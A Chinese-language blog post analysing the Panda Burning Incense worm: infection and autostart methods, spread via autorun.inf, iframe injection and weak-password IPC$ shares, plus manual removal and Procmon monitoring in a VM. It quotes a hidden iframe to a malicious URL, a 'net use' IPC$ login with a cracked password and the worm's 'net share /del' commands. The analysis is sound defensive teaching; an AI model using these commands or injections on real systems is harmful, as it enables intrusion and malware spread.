您可能之前看到過我寫的類似文章，爲什麼還要重複撰寫呢？只是想更好地幫助初學者瞭解病毒逆向分析和系統安全，更加成體系且不破壞之前的系列。因此，我重新開設了這個專欄，準備系統整理和深入學習系統安全、逆向分析和惡意代碼檢測，“系統安全”系列文章會更加聚焦，更加系統，更加深入，也是作者的慢慢成長史。換專業確實挺難的，逆向分析也是塊硬骨頭，但我也試試，看看自己未來四年究竟能將它學到什麼程度，漫漫長征路，偏向虎山行。享受過程，一起加油~

如果你想成爲一名逆向分析或惡意代碼檢測工程師，或者對系統安全非常感興趣，就必須要認真分析一些惡意樣本。熊貓燒香病毒就是一款非常具有代表性的病毒，當年造成了非常大的影響，並且也有一定技術手段。本文將詳細講解熊貓燒香的行爲機理，並通過軟件對其功能行爲進行分析，這將有助於我們學習逆向分析和反病毒工作。後續作者還將對其進行逆向調試，以及WannaCry勒索蠕蟲、各種惡意樣本及木馬的分析。基礎性文章，希望您喜歡！同時，本文部分實驗參考姜曄老師的視頻分析，真的非常佩服和值得去學習的一位老師。技術路上哪有享樂，爲了提升安全能力，別抱怨，幹就對了~

話不多說，讓我們開始新的征程吧！您的點贊、評論、收藏將是對我最大的支持，感恩安全路上一路前行，如果有寫得不好的地方，可以聯繫我修改。基礎性文章，希望對您有所幫助，作者的目的是與安全人共同進步，加油！也強烈推薦大家去看看參考文獻的視頻和書籍。

作者的github資源：

系統安全：https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
網絡安全：https://github.com/eastmountyxz/NetworkSecuritySelf-study

前文分析：

聲明：本人堅決反對利用教學方法進行犯罪的行爲，一切犯罪行爲必將受到嚴懲，綠色網絡需要我們共同維護，更推薦大家瞭解它們背後的原理，更好地進行防護。該樣本不會分享給大家，分析工具會分享。（參考文獻見後）

一.PE病毒概念

首先簡單給大家普及下PE病毒的基礎概念和分類，方便大家理解熊貓燒香病毒的行爲。

什麼是PE病毒？
PE病毒是以Windows PE程序爲載體，能寄生於PE文件或Windows系統的病毒程序。PE病毒數量非常之多，包括早起的CIH病毒，全球第一個可以破壞計算機硬件的病毒，它會破壞主辦的BIOS，對其數據進行擦寫修改。再比如熊貓燒香、機器狗等等，其危害非常之大。

什麼叫感染？
說到病毒，不得不提感染。感染是指在儘量不影響目標程序（系統）正常功能的前提下，而使其具有病毒自身的功能。什麼叫病毒自身的功能呢？一個病毒通常包括如下模塊：

感染模塊： 被感人程序同樣具備感染能力
觸發模塊： 在特定條件下實施相應的病毒功能，比如日期、鍵盤輸入等
破壞模塊
其他模塊

編寫病毒的核心技術
如果我們要編寫PE病毒，則需要掌握以下的關鍵技術：

病毒的重定位
獲取API函數地址
文件搜索
內存映射文件
病毒如何感染其他文件
病毒如何返回到Host程序

PE病毒分類
以感染目標進行分類，包括：

文件感染型
將代碼寄生在PE文件，病毒本身只是PE文件的一部分，依賴於感染目標，通常也叫HOST文件，控制權獲得也是以目標程序運行來獲得的。它分爲傳統感染型（以Win32彙編程序編寫爲主）和捆綁釋放型（編寫難度較低，通過高級語言均可編寫，將目標程序和病毒程序捆在一起，和捆綁器有相似之處）。
系統感染型
將代碼或程序寄生在Windows操作系統，該類病毒越來越多，它不感染具體文件，但是它會在操作系統中保存自己的實體。同時也可以通過系統啓動的方法來獲取控制權。傳播途徑包括：即時通信軟件（如QQ尾巴）、U盤、光盤、電子郵件、網絡共享、其他途徑等。

熊貓燒香病毒屬於捆綁釋放型，其感染實現起來比較簡單，目前很大一部分病毒程序都採用這種方法。捆綁釋放型感染時將目標HOST程序作爲數據存儲在病毒體內，當執行病毒程序時，它先執行病毒程序，然後還原並執行HOST文件，從而保證被感染的程序本身能正常運行，不會引起一些異樣。如下圖所示，左邊是一個正常程序（QQ），感染之後會將病毒放在前面，正常程序放在後面，程序運行之後，病毒會拿到控制權。但缺點是程序圖標會顯示前面的病毒程序，顯示熊貓燒香，這是一個明顯的被感染特徵。

常見自啓動方式
PE病毒運行之後，需要使用自啓動技術保證下次開機再運行。常見的自啓動方式包括：

註冊表中的鍵值
特定路徑的特定文件
系統中的特定位置，如Explorer.exe（顯示桌面）。
利用系統自動播放機制Autorun.inf
比如U盤病毒或光盤病毒就是利用U盤或光盤的自動播放功能。目前，也有一些U盤插入之後，不需要你去雙擊這個U盤，裏面的程序就會自啓動。
在其他可執行文件嵌入少量觸發代碼
比如修改引入函數節啓動DLL病毒文件（添加相應結構，初始化代碼觸發），或在特定PE文件代碼段插入觸發代碼等（只需定位可執行程序並運行）。
DLL劫持：替換已有DLL文件
很多應用程序或操作系統執行時，都會去執行DLL文件，如果病毒將自身做成一個DLL文件，同時將系統DLL文件替換。可想而知，系統啓動時，它是根據文件名啓動的，此時病毒DLL文件就會拿到控制權，如果拿到控制權之後再進一步裝載原始DLL文件，這樣系統的本身機制也不會受到影響，隱蔽性更強。該方法非常常見，甚至有一些病毒程序將反病毒軟件可依賴的DLL文件替換。

下圖展示了Autoruns軟件看到Windows操作系統進行自啓動的選項。如果病毒本身能很好地結合這套機制，它可以做的事情非常多，並且具有很好的隱蔽性。

再比如我們之前分享的WinRAR漏洞（CVE-2018-20250），當惡意ACE文件被受害者解壓之後，會釋放惡意木馬至指定目錄（系統自啓動文件夾），受害者重啓電腦會執行惡意木馬。如下圖所示：

[網絡安全自學篇] 三十六.WinRAR漏洞復現（CVE-2018-20250）及惡意軟件自啓動劫持

常見傳播方式
一切可對外交互的渠道都可傳播，包括：

各類存儲設備（軟盤、光盤、U盤、移動硬盤、智能設備）
各類網絡通信方式（QQ、MSN、Email、淘寶旺旺、微信、微博等）
各類網絡連接方式（有線、wifi、藍牙等）
各類網絡應用（迅雷、BT等）

比如通過可移動存儲設備傳播的非感染式病毒，即Autorun.inf。下圖顯示了Autorun.inf文件，如果文件存在U盤根目錄，當我們雙擊這個U盤時，它就會觸發對應的病毒，如果選擇U盤盤符右鍵打開或打開資源管理器，這是進入的也是病毒程序。當然演示的是計算器程序。

[AutoRun]
open=mspaint.exe
shell\open=打開(&O)
shell\open\Command=calc.exe
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command=calc.exe

最後展示Stuxnet震網事件的漏洞利用過程和啓動方式，傳統的Autorun方式很容易被禁止掉，而Stuxnet利用的是lnk漏洞（MS10-046），它會在目標U盤下放入lnk快捷方式及病毒程序（如DLL文件）。不管通過什麼方式進入U盤，lnk文件會被解析從而觸發漏洞，導致U盤中的病毒程序被執行，所以0Day漏洞也越來越多應用到安全攻擊中。

二.什麼是熊貓燒香病毒

熊貓燒香（Worm.WhBoy）是一款擁有自動傳播、自動感染硬盤能力和強大的破壞能力的病毒，它不但能感染系統中exe、com、pif、src、html、asp等文件，它還能中止大量的反病毒軟件進程並且會刪除擴展名爲gho的文件。該文件是一系統備份工具GHOST的備份文件，使用戶的系統備份文件丟失。被感染的用戶系統中所有.exe可執行文件全部被改成熊貓舉着三根香的模樣。2006年10月16日由25歲的湖北武漢李俊編寫，2007年1月初肆虐網絡，它主要通過下載的文件傳染傳播。

2006-2007年，“熊貓燒香”可謂是轟動一時。時隔多年，當我們回過頭再次來看該事件，“熊貓燒香”的破壞力遠大於其技術含量，尤其是對網絡信息安全產生深遠的影響，畢竟它是第一個讓中國普通用戶對木馬病毒有所認識和感知的。現在從技術角度來看，熊貓燒香病毒技術水平一般，但病毒作者在當時運用的各類技術手法還是值得安全人蔘考和借鑑的。

首先其可以感染exe文件，也可以將以.gho結尾的文件刪除
其次是將源病毒感染到Web文件，使網頁成爲它傳播的介質
然後在傳播層面，病毒作者使用衆多傳播途徑
最後是具備一定的對抗殺軟能力

正如騰訊安全聯合實驗室文章說的一樣（見參考文獻），熊貓燒香病毒如果是放在現在，這些基本是所有病毒木馬常見、必備的技術，但技術不可同日而語。隨着人工智能、大數據、雲計算區塊鏈等先進技術的不斷髮展，病毒作者也將這些技術手段運用到各類安全攻擊中危害大家。典型的包括：

勒索病毒：在2017年5月12日，一款名爲WannaCry勒索病毒通過MS17-010漏洞在全球範圍大爆發，感染了大量的計算機。此後，Petya、Bad Rabbit、GlobeImposter等勒索病毒相繼對企業及機構發起攻擊。
挖礦木馬：伴隨着比特幣等虛擬數字貨幣交易火爆的同時，越來越多的人利用數字虛擬幣交易大發橫財，吸引大量黑產從業人員進入挖礦產業，這也是爲什麼2017年之後披露的挖礦木馬攻擊事件數量呈現出爆發式的增長。
APT攻擊：當前魚叉攻擊、水坑攻擊、遠程可執行漏洞和密碼爆破攻擊等手段依然是APT攻擊的最主要方式。未來，Fileless攻擊、將通信的C&C服務器存放在公開的社交網站上、使用公開或者開源工具、多平臺攻擊和跨平臺攻擊將成APT攻擊技術的主要發展趨勢。
IoT攻擊：黑客通常通過設備弱口令或者遠程命令執行漏洞對IoT設備進行攻擊，攻擊者通過蠕蟲感染或者自主的批量攻擊來控制批量目標設備，構建殭屍網絡，IoT設備成爲了黑客最新熱愛的武器。

除此之外，供應鏈攻擊、AI對抗樣本、視頻語音欺騙等攻擊延伸都是未來黑客技術的發展趨勢，這些都應該引起我們足夠的重視。這些病毒事件一方面會警醒我們網絡空間安全，另一方面也會督促我們安全人員不斷思考和對抗。未知攻，焉知防。

三.熊貓燒香病毒行爲分析

熊貓燒香病毒有它的特殊性，也有它的通用性。下面結合第一部分PE病毒基礎知識，介紹熊貓燒香病毒的基本行爲。

(1) 自啓動方式

熊貓燒香病毒將自身拷貝至系統目錄，同時修改註冊表將自身設置爲開機啓動項
這種方式也是絕大部分病毒自啓動所採用的方式。
拷貝自身到所有驅動器根目錄（盤符），命名爲Setup.exe，在驅動器根目錄生成autorun.inf文件，並把它設置爲隱藏、只讀、系統
autorun.inf文件的作用是允許在雙擊磁盤時自動運行指定的某個文件，即運行Setup.exe。

注意，該Setup.exe文件被設置爲隱藏、只讀、系統，雖然我們可以查看“隱藏的項目”，但某些隱藏的系統文件仍然是看不到的。

我們需要進一步設置，取消勾選“隱藏保護的操作系統文件”，才能顯示這類文件，如下圖所示。而通常設置爲隱藏的系統文件是較難被覺察的，尤其當這類文件被寫入到某個指定的操作系統目錄中，防不勝防。

(2) 感染與傳播方式

感染可執行文件
熊貓燒香病毒會搜索並感染系統中特定目錄外的所有.EXE / .SCR / .PIF / .COM等文件，將自身捆綁在被感染文件前端，並在尾部添加標記信息：.WhBoy{原文件名}.exe.{原文件大小}。注意，它感染的是特定目錄外的，而某些系統目錄是不去感染的，因爲Windows系統某些可執行文件是有還原機制的，系統文件修改有時候會有報警提示。
感染網頁
熊貓燒香病毒會查找系統以 .html 和 .asp 爲後綴的文件，在裏面插入網頁標記，這個幀iframe會將另外一個URL嵌入到當前網頁，並且寬度和高度設置爲0（看不到）。嵌入頁面後會利用如IE瀏覽器的漏洞來觸發惡意代碼，從而釋放相應病毒出來。

 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0">
 </iframe>

通過弱口令傳播
這種傳播方式非普遍，它會訪問局域網共享文件夾將病毒文件拷貝到該目錄下，並改名爲GameSetup.exe（模擬遊戲名稱）；通過弱口令猜測從而進入系統C盤。

(3) 自我隱藏

禁用安全軟件
熊貓燒香病毒會嘗試關閉安全軟件（殺毒軟件、防火牆、安全工具）的窗口、進程，比如包含360的名稱等；刪除註冊表中安全軟件的啓動項；禁用安全軟件的服務等操作。
自動恢復“顯示所有文件和文件夾”選項隱藏功能
某些用戶去看隱藏文件，會主動點擊查看隱藏文件夾，但這個病毒會自動恢復隱藏。
刪除系統的隱藏共享（net share）
Windows系統其實默認會開啓隱藏共享 C$ ，比如早期的 IPC$ 管道等，通過net share命令可以刪除隱藏共享。

IPC$ (Internet Process Connection)
在未經授權情況很難將木馬拷貝到別人的電腦上。這裏需要利用IPC $ 漏洞，調用445端口號實現。445端口中有個IPC $ ，稱之爲空連接，沒有固定文件夾的共享；而C$ 、D$ 、E$ 代表分區共享，是有固定文件夾的。換句話說，445端口打開就相當於我們可以在局域網中輕鬆訪問各種共享文件夾，如果您的電腦是弱密碼，很容易就被攻破，這裏使用IPC $ 暴力爆破。

IPC $ (Internet Process Connection) 是共享“命名管道”的資源，它是爲了讓進程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道並以此通道進行加密數據的交換，從而實現對遠程計算機的訪問。IPC $ 是NT2000的一項新功能，它有一個特點，即在同一時間內，兩個IP之間只允許建立一個連接。NT2000在提供了 IPC $ 功能的同時，在初次安裝系統時還打開了默認共享，即所有的邏輯共享(C$ 、D$ 、E$ …)和系統目錄(C:\windows)共享。所有的這些初衷都是爲了方便管理員的管理，但好的初衷並不一定有好的收效，一些別有用心者會利用IPC$訪問共享資源，導出用戶列表，並使用一些字典工具，進行密碼探測。

推薦作者前文：[網絡安全自學篇] 木馬原理詳解、遠程服務器IPC $漏洞及木馬植入實驗

下圖展示了使用NTscan軟件暴力爆破，該軟件支持遠程連接IPC $和利用字典文件。運行軟件，輸入IP地址“10.1.1.2”，選擇IPCsan連接共享“IPC $”，成功獲取了密碼“123.com”。接着與目標主機建立IPC $ 空連接。

net use \\10.1.1.2\ipc$ 123.com /user:administrator

(4) 破壞功能

熊貓燒香病毒同時會開另一個線程連接某網站下載DDOS程序進行發動惡意攻擊
具有破壞功能，可開啓附件攻擊行爲，熊貓燒香感染計算機臺數非常多，它就能發動多臺電腦發起DDOS攻擊。
刪除擴展名爲gho的文件，延長存活時間
該文件是系統備份工具GHOST的備份文件，從而使用戶的系統備份文件丟失。當用戶中了病毒，想去恢復時就存在困難了。

這就是一個典型的病毒案例，當然現在很多病毒功能都具有相似性，它們有經濟利益趨勢。當然對於不同的病毒來說，如果它的目的不一樣，其行爲會存在很大差異。當然熊貓燒香病毒的隱蔽性不是很好，每一個感染者都會知道自己已被感染。

四.樣本運行及查殺防禦

首先，作者將熊貓燒香病毒拷貝到虛擬機系統中，注意一定不能真機去運行，更不能去破壞或傷害他人。該樣本不會分享給大家，任何破壞行爲都將受到嚴懲，我僅是從反病毒原理及防禦方面進行技術分享。

實驗環境：Windows XP
實驗文件：熊貓燒香.exe

正如姜曄老師說的一樣，手動查殺病毒基本流程如下：

排查可疑進程
因爲病毒往往會創建出來一個或者多個進程，因此需要分辨出哪些進程是由病毒所創建，然後刪除可疑進程。
檢查啓動項
病毒爲了實現自啓動，會採用一些方法將自己添加到啓動項中，從而實現自啓動，所以我們需要把啓動項中的病毒清除。
刪除病毒
在上一步的檢查啓動項中，我們就能夠確定病毒主體的位置，這樣就可以順藤摸瓜，從根本上刪除病毒文件。
修復被病毒破壞的文件
這一步一般來說無法直接通過純手工完成，需利用相應的軟件，不是我們討論的重點。

爲什麼計算機中安裝了殺毒軟件，還要去手動查殺呢？
因爲殺毒軟件存在嚴重的滯後性，必須要等病毒工程師抓取對應樣本，並進行分析總結病毒的特徵碼，再加入殺軟病毒庫後才能識別病毒，但病毒會存在各種變種，因此手動查殺也是必要的。同時，這對我們反病毒工程師來說也是認識和熟悉病毒的過程，在技術上是非常必要的。這也是現在爲什麼很多雲沙箱、雲殺軟、動態更新的技術不斷出現。

實驗目的：

學會基本的手動查殺理論
學會利用DOS命令行刪除病毒及其影響

第一步，運行病毒前打開任務管理器觀察此時打開的進程。

第二步，運行程序，可以發現任務管理器就自動關閉，並且無法再次打開（總一閃而過）。
那麼，我們怎麼查看系統中的進程呢？

第三步，打開CMD命令提示符，輸入命令“tasklist”查看。

顯示進程信息如下圖所示，我們發現多出來“spoclsv.exe”進程。該程序即爲熊貓燒香病毒創建出來的進程。

第四步，輸入“taskkill /f /im 1684”命令強制結束這個進程，其中“/f”表示強制執行，“/im”表示文件鏡像，“1684”對應PID值。如下圖所示，成功殺掉該進程。

第五步，排查可疑進程之後，我們接下來查詢啓動項，在運行中輸入msconfig。

顯示如下圖所示，可以看到“spoclsv”啓動項。

第六步，檢測該啓動項創建的位置及鍵值。

C:\WINDOWS\System32\drivers\spoclsv.exe
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

第七步，我們打開註冊表查看對應的值，發現創建了一個svcshare的值，並啓動對應exe程序。

接着我們打開這個目錄查看。

C:\WINDOWS\System32\drivers\spoclsv.exe

第八步，取消勾選“spoclsv”啓動項，點擊“確定”。

先暫時不重啓計算機。

接着刷新註冊表，發現“spoclsv”已經消失，表示啓動項已經成功被刪除。

第九步，我們需要刪除這個病毒，這裏使用CMD命令行對其進行刪除。

輸入“del /f spoclsv.exe”強制刪除該文件，顯示如下圖所示，成功刪除。

寫到這裏，我們是否真的成功清除了熊貓燒香病毒呢？
NO，該病毒還將自身複製到每一個磁盤的根目錄下。

第十步，刪除隱藏系統只讀的文件。
輸入“dir /ah”查看隱藏的文件，發現autorun.inf和setup.exe。

接着強制刪除這兩個文件，也可以將文件屬性修改後刪除。

del /ah /f autorun.inf
del /ah /f setup.exe
attrib -s -r -h setup.exe：消除隱藏、系統、只讀屬性

重啓系統後，所有手動查殺病毒的工作完畢，我們的系統就又恢復正常了。

五.Procmon檢測病毒行爲

接着我們通過Process Monitor工具來監控熊貓燒香病毒的行爲。

1.軟件基本介紹

Process Monitor是微軟推薦的一款系統監視工具，能夠實時顯示文件系統、註冊表（讀寫）、網絡連接與進程活動的高級工具。它整合了舊的Sysinternals工具、Filemon與Regmon，其中Filemon專門用來監視系統中的任何文件操作過程，Regmon用來監視註冊表的讀寫操作過程。

Filemon：文件監視器
Regmon：註冊表監視器

同時，Process Monitor增加了進程ID、用戶、進程可靠度等監視項，可以記錄到文件中。它的強大功能足以使Process Monitor成爲您系統中的核心組件以及病毒探測工具。

Process Monitor可以幫助使用者對系統中的任何文件、註冊表操作進行監視和記錄，通過註冊表和文件讀寫的變化，有效幫助診斷系統故障或發現惡意軟件、病毒及木馬。

下載Procmon.exe軟件後，直接雙擊啓動，Procmon會自動掃描分析系統當前程序的運行情況。其中，下圖框出來的4個常用按鈕作用分別爲：捕獲開關、清屏、設置過濾條件、查找。最後5個並排的按鈕，是用來設置捕獲哪些類型的事件，分別表示註冊表的讀寫、文件的讀寫、網絡的連接、進程和線程的調用和配置事件。一般選擇前面2個，分別爲註冊表和文件操作。

輸出結果中包括序號、時間點、進程名稱、PID、操作、路徑、結果、描述等，監控項通常包括：

文件系統
註冊表
進程：跟蹤所有進程和線程的創建和退出操作
剖析事件：掃描系統中所有活動線程，爲每個線程創建一個剖析事件，記錄它耗費的核心和用戶CPU時間，以及該線程自上次剖析事件以來執行了多少次上下文轉換

更多用法推薦作者的前文，下面直接講解針對熊貓燒香病毒的行爲分析。

[網絡安全自學篇] 四十九.Procmon軟件基本用法及文件進程、註冊表查看

2.病毒行爲檢測

第一步，打開Procmon.exe軟件。

第二步，在篩選器中選擇打開Procmon.exe軟件，Filter中選擇過濾病毒的名稱“setup.exe”。

Process Name is setup.exe

然後點擊添加和應用。

第三步，運行熊貓燒香病毒，可以看到它捕獲了非常多的病毒信息。

第四步，首先查看病毒的Process Tree（進程樹）。

可以看到setup.exe的熊貓燒香病毒程序，並衍生出一個spoclsv.exe程序。位置信息爲：

C:\WINDOWS\system32\drivers\spoclsv.exe

第五步，發現spoclsv.exe程序三次打開cmd，運行net share命令刪除各個磁盤共享及系統根目錄共享。

net share C$ /del /y
net share Z$ /del /y：虛擬機共享功能盤
net share admin$ /del /y

此時我們總結病毒的行爲：

第1點行爲：創建spoclsv.exe程序並位於WINDOWS\system32\drivers目錄
第2點行爲：命令行模式下使用net share解除共享功能

第六步，回到Procmon軟件進行深入分析。關閉其他結果，只顯示註冊表行爲。

接着在過濾器中僅顯示對註冊表修改的值，如下圖所示。

Operation is RegSetValue

主要修改的是Seed項，就是隨機數種子的生成。但僅僅通過這個信息無法推測註冊表的行爲，所以該病毒對註冊表並沒有什麼實質性影響。

第七步，查看病毒對文件的修改。
在過濾器中刪除註冊表的修改，然後檢測熊貓燒香病毒是否創建文件，創建文件也是病毒的重要手段。

Operation is CreateFile

可以看到主要創建的文件是WINDOWS\system32\drivers目錄下，其他並沒有特別的東西。所以setup.exe程序對我們的系統並沒有實質性影響，主要影響還是spoclsv.exe程序，所以下一步操作就是監控spoclsv.exe程序。

第八步，在過濾器中刪除對setup.exe的監控，設置對spoclsv.exe程序的監控。

Process Name is spoclsv.exe

第九步，在過濾器中查看spoclsv.exe刪除註冊表選項。

Operation is RegDeleteValue

從這些名稱可以看到它們都是常用的殺毒軟件名稱，其位置是CurrentVersion的Run下面，即將殺毒軟件的自動啓項全部刪除。

第3點行爲：刪除安全類軟件在註冊表中自動啓項

第十步，在過濾器中查看spoclsv.exe創建及設置的註冊表鍵值。

Operation is RegCreateKey
Operation is RegSetValue

顯示結果如下圖所示，病毒設置了自啓動項，要啓動的本體是drivers目錄下的spoclsv.exe。

第4點行爲：在註冊表CurrentVersion\Run創建svcshare自啓動項，每次開機時會自動運行病毒

繼續查看，發現它對文件實現隱藏，設置該值後，即使我們在文件夾選項中選擇顯示所有文件和文件夾，也無法顯示隱藏文件。

第5點行爲：禁用文件夾隱藏選項，修改註冊表使得隱藏文件無法通過普通設置顯示，從而隱藏病毒自身

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

第十一步，在過濾器中查看spoclsv.exe文件操作。

熊貓燒香病毒創建文件包括：

在C:\WINDOWS\system32\drivers中創建spoclsv.exe
磁盤根目錄創建setup.exe與autorun.inf
某些目錄中創建Desktop_.ini文件

由於創建這些文件之後就對註冊表的SHOWALL項進行了設置，使得隱藏文件無法顯示，那麼有理由相信，所創建出來的這些文件的屬性都是“隱藏”的。

第6點行爲：將自身拷貝到根目錄並命名爲setup.exe，創建autorun.inf用於病毒的啓動，這兩個文件的屬性都是“隱藏”。同時，會創建Desktop_.ini隱藏文件

第十二步，在過濾器中查看spoclsv.exe網絡行爲。
從監控結果可以看到，病毒會向局域網發送並接收信息，並不斷嘗試向外進行連接和發送數據包。

寫到這裏，我們基本已經分析了熊貓燒香的病毒行爲，但這些行爲仍然無法徹底瞭解病毒的行爲，還需要通過OllyDbg逆向分析和IDA靜態分析來實現。同時，熊貓燒香病毒還有一些其他的行爲，包括：

感染EXE文件，病毒會搜索並感染系統中特定目錄外的所有.EXE/.SCR/.PIF/.COM文件，並將EXE執行文件的圖標改爲熊貓燒香的圖標。
試圖用以弱口令訪問局域網共享文件夾，如果發現弱口令共享，就將病毒文件拷貝到該目錄下，並改名爲GameSetup.exe，以達到通過局域網傳播的功能。
查找系統以.html和.asp爲後綴的文件並在裏面插入iframe，該網頁中包含在病毒程序，一旦用戶使用了未安裝補丁的IE瀏覽器訪問該網頁就可能感染該病毒。
刪除擴展名爲gho的文件，該文件是系統備份工具GHOST的備份文件，這樣可使用戶的系統備份文件丟失。

六.總結

寫到這裏，這篇文章就介紹完畢，希望對您有所幫助，最後進行簡單的總結下。

PE病毒概念
什麼是熊貓燒香病毒
熊貓燒香病毒行爲分析
樣本運行及查殺防禦
Procmon檢測病毒行爲

同時，請讀者思考幾個問題。

病毒感染了多少文件，重裝操作系統是否可以徹底清除病毒？
如何編寫程序迅速掃描出惡意樣本需要實現的操作及行爲。
熊貓燒香病毒傳播時的圖標問題，是作者故意爲之？！
病毒在什麼情況下需要進行圖標替換？圖標替換過程中可能會遇到哪些問題，如何解決？
在無文件加載中，如果DLL沒有實體文件，是否可以在內存中完成DLL加載？
病毒運行一定要開啓新的進程嗎？
如何編寫感染性病毒的清除程序？其與系統感染性病毒的清除方法有何差異？

學安全一年，認識了很多安全大佬和朋友，希望大家一起進步。這篇文章中如果存在一些不足，還請海涵。作者作爲網絡安全初學者的慢慢成長路吧！希望未來能更透徹撰寫相關文章。同時非常感謝參考文獻中的安全大佬們的文章分享，深知自己很菜，得努力前行。

有點想家和女神了！月是故鄉圓啊~接着加油。

2020年8月18新開的“娜璋AI安全之家”，主要圍繞Python大數據分析、網絡空間安全、人工智能、Web滲透及攻防技術進行講解，同時分享CCF、SCI、南核北核論文的算法實現。娜璋之家會更加系統，並重構作者的所有文章，從零講解Python和安全，寫了近十年文章，真心想把自己所學所感所做分享出來，還請各位多多指教，真誠邀請您的關注！謝謝。

(By:Eastmount 2021-01-04 週一夜於武漢 http://blog.csdn.net/eastmount/ )

參考文獻：
姜曄老師真的非常佩服和值得去學習，希望自己和大家的技術能不斷提升，加油！

[系統安全] 十一.那些年的熊貓燒香及PE病毒行爲機理分析

文章目錄

一.PE病毒概念

二.什麼是熊貓燒香病毒

三.熊貓燒香病毒行爲分析

四.樣本運行及查殺防禦

五.Procmon檢測病毒行爲

1.軟件基本介紹

2.病毒行爲檢測

六.總結

《日本蠟燭圖》讀書筆記 & 技術分析回測

《期貨-市場技術分析》讀書筆記

Python多線程編程深度探索：從入門到實戰

mongodb處理json數據很好

35K*14 薪，入職了！這公司只要不裁員，我能一直呆下去！

輪到程序員爲疫苗分發不利背鍋了？

OpenCV 【二十六】計算物體的凸包/創建包圍輪廓的矩形和圓形邊界框

2020年華爲杯數學建模什麼時候出成績——就在今天？

自定義電視端下載模塊

寫代碼有這16個好習慣，可以減少80%非業務的bug

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結